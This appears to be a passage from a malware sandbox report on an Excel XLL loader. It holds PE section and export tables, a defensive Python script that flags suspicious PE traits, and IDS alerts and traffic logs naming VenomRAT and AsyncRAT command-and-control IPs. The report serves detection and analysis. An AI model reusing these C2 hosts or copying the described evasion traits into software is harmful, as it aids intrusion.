                                AN | 0xc000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                f | 0xd000 | 0x1000 | 0x1000 | 98020a5057aa6be2eaea3b630a7955c5 | False | 0.603515625 | data | 5.555156233918424 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                5P0fnl | 0xe000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                V | 0xf000 | 0x1000 | 0x1000 | 86f07bb8988c71f5fe4cef95e03e2289 | False | 0.82470703125 | data | 6.9371450090585824 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                OwHk | 0x10000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                6Hmqv | 0x11000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                APW | 0x12000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                ZLm | 0x13000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                08bnu | 0x14000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                cnEkflK | 0x15000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                J | 0x16000 | 0x1000 | 0x1000 | b66245f88a0f0216f463eaa335558c18 | False | 0.472900390625 | data | 4.560959503733109 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                xym0og | 0x17000 | 0x1000 | 0x1000 | ba0ecb6e60e54e49729d63b76228b1b9 | False | 0.028564453125 | data | 0.23771294614484934 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                50 | 0x18000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                4 | 0x19000 | 0x1000 | 0x1000 | a9144a5633e52e6b0fe287361f1d078e | False | 0.556884765625 | data | 5.262900284027848 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                LQ1yM4J | 0x1a000 | 0x1000 | 0x1000 | 626c018f71e42377a4ea9fa818a19449 | False | 0.266845703125 | data | 2.8377178780633447 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                cMmi | 0x1b000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                2c7K | 0x1c000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                MB | 0x1d000 | 0x1000 | 0x1000 | cf400c1cb4f0509535301a713deed085 | False | 0.5078125 | data | 4.77069666119663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                WRrW | 0x1e000 | 0x1000 | 0x1000 | 16cd76339c79c89f135eb65ec2a44c8b | False | 0.53759765625 | data | 5.34732208523925 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                N8vzTDl | 0x1f000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                St | 0x20000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                K | 0x21000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                gg | 0x22000 | 0x1000 | 0x1000 | ec4b98387a1221c7466cbfb1a051b6af | False | 0.435791015625 | data | 4.242950615062453 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                AXK | 0x23000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                g1Qden | 0x24000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                hE | 0x25000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                QMHTWAj | 0x26000 | 0x1000 | 0x1000 | aecdef93e02bfc2785994ec7f0c64783 | False | 0.0869140625 | data | 0.880695451998313 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                rW8cfn | 0x27000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                rdMxwzY | 0x28000 | 0x1000 | 0x1000 | 2ba2d6b346d3d85e355e5af925f81e76 | False | 0.721923828125 | data | 6.614863663839665 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                6bxL1rP | 0x29000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                cv | 0x2a000 | 0x1000 | 0x1000 | 9c1457a747cbc91f01e527ad838619cb | False | 0.659423828125 | data | 5.945063941389178 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                0oGzWw2 | 0x2b000 | 0x1000 | 0x1000 | e1424ccd59c27469fd5db615852fc9c5 | False | 0.334228515625 | data | 3.0395062734660283 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                j7XIq | 0x2c000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                IW9am | 0x2d000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                QtuG | 0x2e000 | 0x1000 | 0x1000 | 620f099be41b62e4c5facd3d42dec8b2 | False | 0.6748046875 | data | 5.70091531094945 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                mC6u2Nr | 0x2f000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                1jPrI | 0x30000 | 0x1000 | 0x1000 | 3cc333246ffde245e20e879c6c8c881c | False | 0.040771484375 | data | 0.37873079288747763 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                H | 0x31000 | 0x1000 | 0x1000 | ae746bc4685f743439cd29f7253c3c51 | False | 0.4267578125 | data | 4.159396712258145 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                H | 0x32000 | 0x1000 | 0x1000 | bc252a0312fc219d90f86bd625771d0a | False | 0.601318359375 | data | 5.672178362992378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                uZp | 0x33000 | 0x1000 | 0x1000 | 7b35a527a8946580285775f6d23ba855 | False | 0.6640625 | data | 5.732241083064903 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Top | 0x34000 | 0x1000 | 0x1000 | 14078c3095650f9c05122a9135756307 | False | 0.8037109375 | data | 6.692867403992721 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                ek5b | 0x35000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                EhBgBta | 0x36000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                El | 0x37000 | 0x1000 | 0x1000 | 74678cb8ef79b2b9fee32ea0705e9d7a | False | 0.3779296875 | data | 3.772539991159332 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Xr | 0x38000 | 0x1000 | 0x1000 | a38f30c99f0c38af4836be22ce5df25b | False | 0.613525390625 | data | 5.794442665870344 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                xJvDR | 0x39000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .edata | 0x3a000 | 0x43 | 0x200 | 49c12407de8d5df78835d8e9dbb65d0b | False | 0.107421875 | data | 0.6440499004576834 | IMAGE_SCN_MEM_READ
                                .reloc | 0x3b000 | 0x8 | 0x200 | 2c38765194d27b75f56d0565088a53ee | False | 0.03515625 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                DLL | Import
                                gdi32.dll | AngleArc, CopyMetaFileW, PlayEnhMetaFile, GetFontAssocStatus, GdiGetDC, Ellipse, EnableEUDC, CreateRectRgn, SetAbortProc
                                wininet.dll | InternetSetCookieA, InternetDialA, InternetEnumPerSiteCookieDecisionW, InternetSetOptionExW
                                ole32.dll | CreateObjrefMoniker, GetDocumentBitStg, HACCEL_UserFree, CoUnloadingWOW, OleIsCurrentClipboard, OleInitializeWOW, StgSetTimes
                                (The import table names no kernel32 or ntdll function at all, and the GDI, WinINet and OLE entries it does list have no plausible use in an add-in. Any API the loader actually calls must therefore be resolved at runtime, so the import hash above describes a decoy table rather than the sample's real dependencies.)
                                Name | Ordinal | Address
                                xlAutoOpen | 1 | 0xe2f1362
                                (xlAutoOpen is the callback Excel invokes when it loads an XLL add-in, so despite the .dll rename this sample is an Excel XLL, which also fits the ".dqy" Excel-query lure name. Its address is the entry point 0xe2f135a + 8: the DllMain at the entry point is only an 8-byte stub and the add-in's real code begins here.)
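The static checks this report's section and export tables invite (writable+executable sections, empty sections with random names, an xlAutoOpen export whose DllMain is only a stub) can be reproduced without a sandbox. The script below is an added example written for this report, not Joe Sandbox code; it parses the PE32+ section and export tables with the standard library only (no pefile/capstone). Because the real sample is not on the page, build_sample_dll() constructs a minimal stand-in PE in memory whose layout is modelled on the tables above (the section names BVOtlE and TZlC, the xlAutoOpen export at entry + 8) and whose 8-byte stub encoding 48 C7 C0 01 00 00 00 C3 is the inferred reading of the listing; all of that is an assumption, not the analysed file.

```python
"""Static PE32+ triage: RWX sections, empty random-named sections, xlAutoOpen export,
stub DllMain. Added example for this report, not Joe Sandbox code; standard library only.
build_sample_dll() fabricates an in-memory stand-in modelled on the report's tables."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc", ".edata", ".idata", ".tls", ".bss"}
DLLMAIN_STUB = bytes.fromhex("48c7c001000000c3")  # mov rax, 1 ; ret (assumed encoding of the listing's first 3 lines)


def rva_to_offset(sections, rva):
    """Map an RVA to a file offset via the section table; sections with no raw data cannot be read."""
    for s in sections:
        if s["rawsize"] and s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["rawptr"]
    raise ValueError(f"RVA {rva:#x} has no backing file data")


def parse_pe(data):
    """Return entry RVA, export directory RVA and the section table of a PE32+ image."""
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec, = struct.unpack_from("<H", data, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)
    opt = e_lfanew + 24                                   # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
        raise ValueError("only PE32+ (64-bit) images are handled here")
    entry, = struct.unpack_from("<I", data, opt + 16)      # AddressOfEntryPoint
    export_rva, = struct.unpack_from("<I", data, opt + 112)  # data directory 0 = export table
    sections, off = [], opt + opt_size
    for _ in range(nsec):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        chars, = struct.unpack_from("<I", data, off + 36)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "vsize": vsize,
                         "va": va, "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
        off += 40
    return {"data": data, "entry": entry, "export_rva": export_rva, "sections": sections}


def parse_exports(pe):
    """Return {name: {"ordinal", "rva"}} for the named exports."""
    data, secs = pe["data"], pe["sections"]
    if not pe["export_rva"]:
        return {}
    d = rva_to_offset(secs, pe["export_rva"])
    base, nfunc, nnames, afunc, anames, aords = struct.unpack_from("<6I", data, d + 16)
    funcs = struct.unpack_from(f"<{nfunc}I", data, rva_to_offset(secs, afunc))
    names = struct.unpack_from(f"<{nnames}I", data, rva_to_offset(secs, anames))
    ords = struct.unpack_from(f"<{nnames}H", data, rva_to_offset(secs, aords))
    exports = {}
    for name_rva, idx in zip(names, ords):
        n = rva_to_offset(secs, name_rva)
        exports[data[n:data.index(b"\0", n)].decode("ascii")] = {"ordinal": base + idx, "rva": funcs[idx]}
    return exports


def triage(data):
    """Apply the checks the report's tables suggest and return them as a dict."""
    pe = parse_pe(data)
    secs, wx = pe["sections"], IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    f = {"rwx_sections": [s["name"] for s in secs if s["chars"] & wx == wx],
         "empty_sections": [s["name"] for s in secs if s["rawsize"] == 0],
         "nonstandard_names": [s["name"] for s in secs if s["name"] not in STANDARD_SECTIONS],
         "exports": parse_exports(pe)}
    f["is_xll"] = "xlAutoOpen" in f["exports"]           # Excel calls xlAutoOpen when loading an XLL
    e = rva_to_offset(secs, pe["entry"])
    f["dllmain_is_stub"] = data[e:e + 8] == DLLMAIN_STUB
    f["xlautoopen_follows_entry"] = f["is_xll"] and f["exports"]["xlAutoOpen"]["rva"] == pe["entry"] + 8
    return f


def build_sample_dll():
    """Constructed stand-in (assumption, not the real file): stub DllMain at the entry point,
    xlAutoOpen exported at entry + 8, one random-named RWX section, one empty section."""
    fa, edata_va = 0x200, 0x4000
    text = DLLMAIN_STUB + bytes.fromhex("4881ec18140000c3")  # xlAutoOpen body stand-in: sub rsp, 0x1418 ; ret
    text += b"\0" * (fa - len(text))
    dll_name, fn_name = b"sample.xll\0", b"xlAutoOpen\0"
    strings = edata_va + 50                                   # 40-byte directory + 1 func + 1 name + 1 ordinal
    edata = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, strings, 1, 1, 1, edata_va + 40, edata_va + 44, edata_va + 48)
    edata += struct.pack("<IIH", 0x1008, strings + len(dll_name), 0) + dll_name + fn_name
    edata += b"\0" * (fa - len(edata))
    rwx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    layout = [(b".text", 0x1000, len(text), text, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
              (b"BVOtlE", 0x2000, 0x1000, b"\xcc" * fa, rwx),
              (b"TZlC", 0x3000, 0x200, b"", rwx | IMAGE_SCN_CNT_UNINITIALIZED_DATA),
              (b".edata", edata_va, len(edata), edata, IMAGE_SCN_MEM_READ)]
    hdr = bytearray(b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40))          # DOS header, e_lfanew = 0x40
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, len(layout), 0, 0, 0, 240, 0x2022)  # x64, DLL
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                                    # PE32+ magic
    struct.pack_into("<I", opt, 16, 0x1000)                                  # AddressOfEntryPoint
    struct.pack_into("<QII", opt, 24, 0x180000000, 0x1000, fa)               # ImageBase, section/file alignment
    struct.pack_into("<II", opt, 56, 0x5000, fa)                             # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                                       # IMAGE_SUBSYSTEM_WINDOWS_GUI
    struct.pack_into("<III", opt, 108, 16, edata_va, 72)                     # NumberOfRvaAndSizes, export RVA/size
    hdr += opt
    body = b""
    for name, va, vsize, data, chars in layout:
        hdr += struct.pack("<8sIIIIIIHHI", name, vsize, va, len(data), fa + len(body) if data else 0, 0, 0, 0, 0, chars)
        body += data
    return bytes(hdr) + b"\0" * (fa - len(hdr)) + body


if __name__ == "__main__":
    for key, value in triage(build_sample_dll()).items():
        print(f"{key}: {value}")
```

Run against a real file with `triage(open(path, "rb").read())`. On the stand-in the checks report two RWX sections (BVOtlE, TZlC), one empty section (TZlC), an xlAutoOpen export with ordinal 1 at entry + 8, and a stub DllMain, the same pattern the tables above show for the sample at much larger scale (57 randomly named sections, most of them empty).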
                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                2024-12-10T14:21:40.286613+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49700 | 163.44.198.57 | 443 | TCP
                                2024-12-10T14:21:41.350116+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49701 | 163.44.198.57 | 443 | TCP
                                2024-12-10T14:22:06.671516+0100 | 2842478 | ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) | 1 | 185.208.158.187 | 4449 | 192.168.2.7 | 49756 | TCP
                                2024-12-10T14:22:06.671516+0100 | 2052265 | ET MALWARE Observed Malicious SSL Cert (VenomRAT) | 1 | 185.208.158.187 | 4449 | 192.168.2.7 | 49756 | TCP
                                2024-12-10T14:22:06.671516+0100 | 2052267 | ET MALWARE Observed Malicious SSL Cert (VenomRAT) | 1 | 185.208.158.187 | 4449 | 192.168.2.7 | 49756 | TCP
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Dec 10, 2024 14:21:37.985599041 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:37.985632896 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:37.985924006 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:37.987580061 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:37.987593889 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:39.060693979 CET | 49701 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:39.060736895 CET | 443 | 49701 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:39.060806036 CET | 49701 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:39.061815023 CET | 49701 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:39.061840057 CET | 443 | 49701 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:40.286518097 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:40.286612988 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:40.290731907 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:40.290740967 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:40.291043997 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:40.338176966 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:40.348923922 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:40.391328096 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:40.918282986 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:40.963196993 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.173985004 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.173999071 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.174035072 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.174062967 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.174071074 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.174078941 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.174096107 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.174124002 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.174149990 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.350008011 CET | 443 | 49701 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.350116014 CET | 49701 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.427342892 CET | 49701 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.427366018 CET | 443 | 49701 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.427740097 CET | 443 | 49701 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.439057112 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.439070940 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.439101934 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.439151049 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.439167023 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.439217091 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.439235926 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.478828907 CET | 49701 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.695063114 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.695077896 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.695094109 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.695156097 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.695183992 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.695210934 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.695221901 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.742969990 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.742995024 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.743103027 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.743130922 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.743899107 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.986829996 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.986845970 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
